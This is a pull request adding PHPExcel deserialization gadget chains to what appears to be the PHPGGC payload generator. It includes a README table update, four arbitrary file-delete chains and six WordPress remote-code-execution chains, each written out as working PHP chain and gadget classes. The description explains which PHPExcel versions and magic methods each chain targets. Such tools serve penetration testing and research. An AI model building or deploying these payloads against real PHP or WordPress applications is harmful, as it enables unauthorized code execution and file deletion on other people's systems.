### PR TITLE
Adds PHPExcel gadgets

### DIFF
--- a/README.md
+++ b/README.md
@@ -45,6 +45,10 @@ Monolog/RCE2                              1.5 <= 2.1.1+                   RCE (F
 Monolog/RCE3                              1.1.0 <= 1.10.0                 RCE (Function call)    __destruct          
 Monolog/RCE4                              ? <= 2.4.4+                     RCE (Command)          __destruct     *    
 Phalcon/RCE1                              <= 1.2.2                        RCE                    __wakeup       *    
+PHPExcel/FD1                              1.8.2+                          File delete            __destruct          
+PHPExcel/FD2                              <= 1.8.1                        File delete            __destruct          
+PHPExcel/FD3                              1.8.2+                          File delete            __destruct          
+PHPExcel/FD4                              <= 1.8.1                        File delete            __destruct          
 Pydio/Guzzle/RCE1                         < 8.2.2                         RCE (Function call)    __toString          
 Slim/RCE1                                 3.8.1                           RCE (Function call)    __toString          
 Smarty/FD1                                ?                               File delete            __destruct          
@@ -71,6 +75,12 @@ WordPress/P/EverestForms/RCE1             1.0 <= 1.6.7+ & WP < 5.5.2      RCE (F
 WordPress/P/WooCommerce/RCE1              3.4.0 <= 4.1.0+ & WP < 5.5.2    RCE (Function call)    __destruct     *    
 WordPress/P/WooCommerce/RCE2              <= 3.4.0 & WP < 5.5.2           RCE (Function call)    __destruct     *    
 WordPress/P/YetAnotherStarsRating/RCE1    ? <= 1.8.6 & WP < 5.5.2         RCE (Function call)    __destruct     *    
+WordPress/PHPExcel/RCE1                   1.8.2+ & WP < 5.5.2             RCE (Function call)    __toString     *    
+WordPress/PHPExcel/RCE2                   <= 1.8.1 & WP < 5.5.2           RCE (Function call)    __toString     *    
+WordPress/PHPExcel/RCE3                   1.8.2+ & WP < 5.5.2             RCE (Function call)    __destruct     *    
+WordPress/PHPExcel/RCE4                   <= 1.8.1 & WP < 5.5.2           RCE (Function call)    __destruct     *    
+WordPress/PHPExcel/RCE5                   1.8.2+ & WP < 5.5.2             RCE (Function call)    __destruct     *    
+WordPress/PHPExcel/RCE6                   <= 1.8.1 & WP < 5.5.2           RCE (Function call)    __destruct     *    
 Yii/RCE1                                  1.1.20                          RCE (Function call)    __wakeup       *    
 Yii2/RCE1                                 <2.0.38                         RCE (Function call)    __destruct     *    
 Yii2/RCE2                                 <2.0.38                         RCE (PHP code)         __destruct     *    

--- a/gadgetchains/PHPExcel/FD/1/chain.php
+++ b/gadgetchains/PHPExcel/FD/1/chain.php
@@ -1,0 +1,15 @@
+<?php
+
+namespace GadgetChain\PHPExcel;
+
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '1.8.2+';
+    public static $vector = '__destruct';
+    public static $author = 'erwan_lr';
+    
+    public function generate(array $parameters)
+    {
+        return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']);
+    }
+}

--- a/gadgetchains/PHPExcel/FD/1/gadgets.php
+++ b/gadgetchains/PHPExcel/FD/1/gadgets.php
@@ -1,0 +1,21 @@
+<?php
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
+class PHPExcel_CachedObjectStorage_DiscISAM {
+    private $fileName = null;
+    private $fileHandle = 42;
+
+    public function __construct($filePath) {
+        $this->fileName = $filePath;
+    }
+
+    /*
+    public function __destruct() {
+        if (!is_null($this->fileHandle)) {
+            fclose($this->fileHandle); // Will only produce a warning
+            unlink($this->fileName);
+        }
+        $this->fileHandle = null;
+    }
+    */
+}

--- a/gadgetchains/PHPExcel/FD/2/chain.php
+++ b/gadgetchains/PHPExcel/FD/2/chain.php
@@ -1,0 +1,15 @@
+<?php
+
+namespace GadgetChain\PHPExcel;
+
+class FD2 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '<= 1.8.1';
+    public static $vector = '__destruct';
+    public static $author = 'erwan_lr';
+    
+    public function generate(array $parameters)
+    {
+        return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']);
+    }
+}

--- a/gadgetchains/PHPExcel/FD/2/gadgets.php
+++ b/gadgetchains/PHPExcel/FD/2/gadgets.php
@@ -1,0 +1,21 @@
+<?php
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
+class PHPExcel_CachedObjectStorage_DiscISAM {
+    private $_fileName = null;
+    private $_fileHandle = 42;
+
+    public function __construct($filePath) {
+        $this->_fileName = $filePath;
+    }
+
+    /*
+    public function __destruct() {
+        if (!is_null($this->_fileHandle)) {
+            fclose($this->_fileHandle); // Will only produce a warning
+            unlink($this->_fileName);
+        }
+        $this->_fileHandle = null;
+    }   //  function __destruct()
+    */
+}

--- a/gadgetchains/PHPExcel/FD/3/chain.php
+++ b/gadgetchains/PHPExcel/FD/3/chain.php
@@ -1,0 +1,15 @@
+<?php
+
+namespace GadgetChain\PHPExcel;
+
+class FD3 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '1.8.2+';
+    public static $vector = '__destruct';
+    public static $author = 'erwan_lr';
+    
+    public function generate(array $parameters)
+    {
+        return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']);
+    }
+}

--- a/gadgetchains/PHPExcel/FD/3/gadgets.php
+++ b/gadgetchains/PHPExcel/FD/3/gadgets.php
@@ -1,0 +1,20 @@
+<?php
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php
+class PHPExcel_Shared_XMLWriter {
+    private $tempFileName  = '';
+
+    public function __construct($filePath) {
+        $this->tempFileName = $filePath;
+    }
+
+    /*
+    public function __destruct()
+    {
+        // Unlink temporary files
+        if ($this->tempFileName != '') {
+            @unlink($this->tempFileName);
+        }
+    }
+    */
+}

--- a/gadgetchains/PHPExcel/FD/4/chain.php
+++ b/gadgetchains/PHPExcel/FD/4/chain.php
@@ -1,0 +1,15 @@
+<?php
+
+namespace GadgetChain\PHPExcel;
+
+class FD4 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '<= 1.8.1';
+    public static $vector = '__destruct';
+    public static $author = 'erwan_lr';
+    
+    public function generate(array $parameters)
+    {
+        return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']);
+    }
+}

--- a/gadgetchains/PHPExcel/FD/4/gadgets.php
+++ b/gadgetchains/PHPExcel/FD/4/gadgets.php
@@ -1,0 +1,20 @@
+<?php
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php
+class PHPExcel_Shared_XMLWriter {
+    private $_tempFileName  = '';
+
+    public function __construct($filePath) {
+        $this->_tempFileName = $filePath;
+    }
+
+    /*
+    public function __destruct()
+    {
+        // Unlink temporary files
+        if ($this->_tempFileName != '') {
+            @unlink($this->_tempFileName);
+        }
+    }
+    */
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/1/chain.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/1/chain.php
@@ -1,0 +1,21 @@
+<?php
+
+namespace GadgetChain\WordPress\PHPExcel;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.8.2+ & WP < 5.5.2';
+    public static $vector = '__toString';
+    public static $author = 'erwan_lr';
+    public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2';
+    
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \PHPExcel_RichText(
+            new \Requests_Utility_FilteredIterator([$parameter], $function)
+        );
+    }
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/1/gadgets.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/1/gadgets.php
@@ -1,0 +1,31 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php
+class PHPExcel_RichText {
+    private $richTextElements;
+
+    public function __construct($richTextElements) {
+        $this->richTextElements = $richTextElements;
+    }
+
+    /*
+    public function getPlainText() {
+        // Return value
+        $returnValue = '';
+
+        // Loop through all PHPExcel_RichText_ITextElement
+        foreach ($this->richTextElements as $text) {
+            $returnValue .= $text->getText();
+        }
+
+        // Return
+        return $returnValue;
+    }
+
+    public function __toString() {
+        return $this->getPlainText();
+    }
+    */
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/2/chain.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/2/chain.php
@@ -1,0 +1,21 @@
+<?php
+
+namespace GadgetChain\WordPress\PHPExcel;
+
+class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '<= 1.8.1 & WP < 5.5.2';
+    public static $vector = '__toString';
+    public static $author = 'erwan_lr';
+    public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
+    
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \PHPExcel_RichText(
+            new \Requests_Utility_FilteredIterator([$parameter], $function)
+        );
+    }
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/2/gadgets.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/2/gadgets.php
@@ -1,0 +1,31 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
+class PHPExcel_RichText {
+    private $_richTextElements;
+
+    public function __construct($richTextElements) {
+        $this->_richTextElements = $richTextElements;
+    }
+
+    /*
+    public function getPlainText() {
+        // Return value
+        $returnValue = '';
+
+        // Loop through all PHPExcel_RichText_ITextElement
+        foreach ($this->_richTextElements as $text) {
+            $returnValue .= $text->getText();
+        }
+
+        // Return
+        return $returnValue;
+    }
+
+    public function __toString() {
+        return $this->getPlainText();
+    }
+    */
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/3/chain.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/3/chain.php
@@ -1,0 +1,23 @@
+<?php
+
+namespace GadgetChain\WordPress\PHPExcel;
+
+class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.8.2+ & WP < 5.5.2';
+    public static $vector = '__destruct';
+    public static $author = 'erwan_lr';
+    public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2';
+    
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \PHPExcel_CachedObjectStorage_DiscISAM(
+            new \PHPExcel_RichText(
+                new \Requests_Utility_FilteredIterator([$parameter], $function)
+            )
+        );
+    }
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/3/gadgets.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/3/gadgets.php
@@ -1,0 +1,51 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php
+class PHPExcel_RichText {
+    private $richTextElements;
+
+    public function __construct($richTextElements) {
+        $this->richTextElements = $richTextElements;
+    }
+
+    /*
+    public function getPlainText() {
+        // Return value
+        $returnValue = '';
+
+        // Loop through all PHPExcel_RichText_ITextElement
+        foreach ($this->richTextElements as $text) {
+            $returnValue .= $text->getText();
+        }
+
+        // Return
+        return $returnValue;
+    }
+
+    public function __toString() {
+        return $this->getPlainText();
+    }
+    */
+}
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
+class PHPExcel_CachedObjectStorage_DiscISAM {
+    private $fileName = null;
+    private $fileHandle = 42;
+
+    public function __construct($filePath) {
+        $this->fileName = $filePath;
+    }
+
+    /*
+    public function __destruct() {
+        if (!is_null($this->fileHandle)) {
+            fclose($this->fileHandle); // Will only produce a warning
+            unlink($this->fileName); // Passing an object will call its __toString(), triggering the RCE
+        }
+        $this->fileHandle = null;
+    }
+    */
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/4/chain.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/4/chain.php
@@ -1,0 +1,23 @@
+<?php
+
+namespace GadgetChain\WordPress\PHPExcel;
+
+class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '<= 1.8.1 & WP < 5.5.2';
+    public static $vector = '__destruct';
+    public static $author = 'erwan_lr';
+    public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
+    
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \PHPExcel_CachedObjectStorage_DiscISAM(
+            new \PHPExcel_RichText(
+               new \Requests_Utility_FilteredIterator([$parameter], $function)
+            )
+        );
+    }
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/4/gadgets.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/4/gadgets.php
@@ -1,0 +1,51 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
+class PHPExcel_RichText {
+    private $_richTextElements;
+
+    public function __construct($richTextElements) {
+        $this->_richTextElements = $richTextElements;
+    }
+
+    /*
+    public function getPlainText() {
+        // Return value
+        $returnValue = '';
+
+        // Loop through all PHPExcel_RichText_ITextElement
+        foreach ($this->_richTextElements as $text) {
+            $returnValue .= $text->getText();
+        }
+
+        // Return
+        return $returnValue;
+    }
+
+    public function __toString() {
+        return $this->getPlainText();
+    }
+    */
+}
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
+class PHPExcel_CachedObjectStorage_DiscISAM {
+    private $_fileName = null;
+    private $_fileHandle = 42;
+
+    public function __construct($filePath) {
+        $this->_fileName = $filePath;
+    }
+
+    /*
+    public function __destruct() {
+        if (!is_null($this->_fileHandle)) {
+            fclose($this->_fileHandle); // Will only produce a warning
+            unlink($this->_fileName); // Passing an object will call its __toString(), triggering the RCE
+        }
+        $this->fileHandle = null;
+    }
+    */
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/5/chain.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/5/chain.php
@@ -1,0 +1,23 @@
+<?php
+
+namespace GadgetChain\WordPress\PHPExcel;
+
+class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.8.2+ & WP < 5.5.2';
+    public static $vector = '__destruct';
+    public static $author = 'erwan_lr';
+    public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2';
+    
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \PHPExcel_Shared_XMLWriter(
+            new \PHPExcel_RichText(
+                new \Requests_Utility_FilteredIterator([$parameter], $function)
+            )
+        );
+    }
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/5/gadgets.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/5/gadgets.php
@@ -1,0 +1,50 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php
+class PHPExcel_RichText {
+    private $richTextElements;
+
+    public function __construct($richTextElements) {
+        $this->richTextElements = $richTextElements;
+    }
+
+    /*
+    public function getPlainText() {
+        // Return value
+        $returnValue = '';
+
+        // Loop through all PHPExcel_RichText_ITextElement
+        foreach ($this->richTextElements as $text) {
+            $returnValue .= $text->getText();
+        }
+
+        // Return
+        return $returnValue;
+    }
+
+    public function __toString() {
+        return $this->getPlainText();
+    }
+    */
+}
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php
+class PHPExcel_Shared_XMLWriter {
+    private $tempFileName  = '';
+
+    public function __construct($filePath) {
+        $this->tempFileName = $filePath;
+    }
+
+    /*
+    public function __destruct()
+    {
+        // Unlink temporary files
+        if ($this->tempFileName != '') {
+            @unlink($this->tempFileName); // Passing an object will call its __toString(), triggering the RCE
+        }
+    }
+    */
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/6/chain.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/6/chain.php
@@ -1,0 +1,23 @@
+<?php
+
+namespace GadgetChain\WordPress\PHPExcel;
+
+class RCE6 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '<= 1.8.1 & WP < 5.5.2';
+    public static $vector = '__destruct';
+    public static $author = 'erwan_lr';
+    public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
+    
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \PHPExcel_Shared_XMLWriter(
+            new \PHPExcel_RichText(
+                new \Requests_Utility_FilteredIterator([$parameter], $function)
+            )
+        );
+    }
+}

--- a/gadgetchains/WordPress/PHPExcel/RCE/6/gadgets.php
+++ b/gadgetchains/WordPress/PHPExcel/RCE/6/gadgets.php
@@ -1,0 +1,50 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
+class PHPExcel_RichText {
+    private $_richTextElements;
+
+    public function __construct($richTextElements) {
+        $this->_richTextElements = $richTextElements;
+    }
+
+    /*
+    public function getPlainText() {
+        // Return value
+        $returnValue = '';
+
+        // Loop through all PHPExcel_RichText_ITextElement
+        foreach ($this->_richTextElements as $text) {
+            $returnValue .= $text->getText();
+        }
+
+        // Return
+        return $returnValue;
+    }
+
+    public function __toString() {
+        return $this->getPlainText();
+    }
+    */
+}
+
+# https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php
+class PHPExcel_Shared_XMLWriter {
+    private $_tempFileName  = '';
+
+    public function __construct($filePath) {
+        $this->_tempFileName = $filePath;
+    }
+
+    /*
+    public function __destruct()
+    {
+        // Unlink temporary files
+        if ($this->_tempFileName != '') {
+            @unlink($this->_tempFileName); // Passing an object will call its __toString(), triggering the RCE
+        }
+    }
+    */
+}


### PR DESCRIPTION
Adds some PHPExcel gadgets.

The library (https://github.com/PHPOffice/PHPExcel) is no longer maintained and has been replaced by PHPSpreadSheet, but is still used in some projects (ie WP plugins).

Before v1.8.2, internal variables were prefixed with `_`, hence why there are a lot of gadgets, as 50% are for < 1.8.2, while the other 50% are for >= 1.8.2.

As far as WP is concerned, RCE via `__destruct` was possible by chaining with the `__toString` vector.

Outside of WP, Arbitrary File delete can be achieved.

